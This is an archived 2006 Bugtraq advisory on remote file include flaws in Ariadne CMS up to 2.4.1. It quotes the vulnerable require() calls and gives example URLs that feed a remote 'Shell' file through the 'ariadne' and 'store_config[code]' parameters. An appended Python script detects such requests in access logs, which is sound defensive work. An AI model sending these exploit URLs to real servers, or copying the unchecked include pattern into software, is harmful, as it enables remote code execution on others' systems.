Message-ID: <20061106183051.22478.qmail@securityfocus.com>
Date: 6 Nov 2006 18:30:51 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: Ariadne  <= 2.4.1 Multiple Remote File Include Vulnerabilities(New)

*******************************************************************************
# Title  :  Ariadne  <= 2.4.1 Multiple Remote File Include Vulnerabilities

# Author :   ajann

# Script Page :   http://www.ariadne-cms.org/en/download/

# Vuln;

*******************************************************************************
[Files]
loader.php
loader.cmd.php
[/Files]

[Code,1]
loader.php Error:

..
....
require($ariadne."/configs/ariadne.phtml");
require($ariadne."/configs/ftp/$configfile");
require($ariadne."/configs/store.phtml");
require($ariadne."/includes/loader.ftp.php");
require($ariadne."/configs/sessions.phtml");
require($ariadne."/stores/".$store_config["dbms"]."store.phtml");
require($ariadne."/nls/en");
require($ariadne."/modules/mod_mimemagic.php");

require($ariadne."/modules/mod_virusscan.php");
....
..

Key [:] ariadne=[file]
Key [:] store_config[code]=[file]

Example:

http://target.com/path/ftp/loader.php?ariadne=Shell
http://target.com/path/lib/includes/loader.cmd.php?store_config[code]=Shell
....

# ajann,Turkey
# ...
# I'm not a hacker!
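
Added example, not part of the original post: a log check for requests that set the `ariadne` or `store_config[...]` variables on the two loader scripts named in the advisory. It assumes Apache combined-format access logs; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and request variables named in the advisory above.
SCRIPTS = ("loader.php", "loader.cmd.php")
VARS = ("ariadne", "store_config")

# Request field of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return the query keys in `target` that set one of VARS on one of SCRIPTS."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1].lower() not in SCRIPTS:
        return []
    hits = []
    # parse_qsl percent-decodes keys, so store_config%5Bcode%5D is caught too.
    for key, _value in parse_qsl(parts.query, keep_blank_values=True):
        base = key.split("[", 1)[0].strip().lower()  # store_config[code] -> store_config
        if base in VARS:
            hits.append(key)
    return hits


def scan(lines):
    """Yield (line_number, target, keys) for each log line that matches."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            keys = suspicious_params(match.group(1))
            if keys:
                yield number, match.group(1), keys


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Nov/2006:18:31:02 +0000] "GET /path/ftp/loader.php?ariadne=x HTTP/1.1" 200 512',
    '192.0.2.11 - - [06/Nov/2006:18:31:09 +0000] "GET /path/lib/includes/loader.cmd.php?store_config%5Bcode%5D=x HTTP/1.1" 200 77',
    '192.0.2.12 - - [06/Nov/2006:18:32:40 +0000] "GET /path/loader.php?page=home HTTP/1.1" 200 9001',
    '192.0.2.13 - - [06/Nov/2006:18:33:05 +0000] "GET /index.php?ariadne=x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, target, keys in scan(SAMPLE_LOG):
        print(f"line {number}: {target} sets {keys}")
```

Access logs record only the query string, so the same variables sent in a POST body or a cookie will not appear here and need a request-body source such as a WAF or proxy log.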
